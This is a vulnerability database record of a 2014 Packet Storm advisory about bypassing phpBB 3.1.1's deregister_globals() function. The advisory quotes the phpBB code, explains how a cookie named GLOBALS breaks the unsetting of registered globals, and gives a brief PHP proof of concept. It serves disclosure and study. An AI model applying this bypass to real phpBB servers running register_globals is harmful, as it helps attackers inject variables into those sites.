DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:129274", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpBB 3.1.1 deregister_globals() Bypass", "description": "", "published": "2014-11-26T00:00:00", "modified": "2014-11-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/129274/phpBB-3.1.1-deregister_globals-Bypass.html", "reporter": "Taoguang Chen", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:26:14", "viewCount": 17, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678921929}, "_internal": {"score_hash": "f2532948a470a6060f1afd941e09cbc7"}, "sourceHref": "https://packetstormsecurity.com/files/download/129274/phpbbderegglobal-bypass.txt", "sourceData": "`When PHP's register_globals configuration directive set on, phpBB will call \nderegister_globals() function, all global variables registered by PHP will \nbe destroyed. But deregister_globals() functions can be bypassed. \n \n``` \n$input = array_merge( \narray_keys($_GET), \narray_keys($_POST), \narray_keys($_COOKIE), \narray_keys($_SERVER), \narray_keys($_SESSION), \narray_keys($_ENV), \narray_keys($_FILES) \n); \n \nforeach ($input as $varname) \n{ \nif (isset($not_unset[$varname])) \n{ \nif ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || \nisset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || \nisset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || \nisset($_FILES['GLOBALS'])) \n{ \nexit; \n} \nelse \n{ \n$cookie = &$_COOKIE; \nwhile (isset($cookie['GLOBALS'])) \n{ \nif (!is_array($cookie['GLOBALS'])) \n{ \nbreak; \n} \n.... \n} \n} \nunset($GLOBALS[$varname]); \n} \n``` \n \nIn the above code we see, when request $_COOKIE['GLOBALS'] = 1, \n$GLOBALS['GLOBALS'] will be destroyed by unset(). This means $GLOBALS array \nwill be destroyed. This also means you will not be able to use \n$GLOBALS['key'] to access or control a global variable in all scopes \nthroughout a script. Because the binding between the $GLOBALS array and the \nglobal symbol table has been broken. All global variables registered by PHP \nform $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will be not \nunregistered. \n \nProof of Concept \n \n``` \n$_COOKIE['GLOBALS'] = 1; \n$_COOKIE['ryat'] = $ryat = 'ryat'; \n \nderegister_globals(); \n \nvar_dump($GLOBALS); \nvar_dump($ryat); \n \n$GLOBALS['ryat'] = 'hi'; \n \nvar_dump($GLOBALS); \nvar_dump($ryat); \n``` \n \nP.S. I had reported the issue to the phpBB developers, but they do not \nconsider this a security issue. \n \n \n`\n"}

{}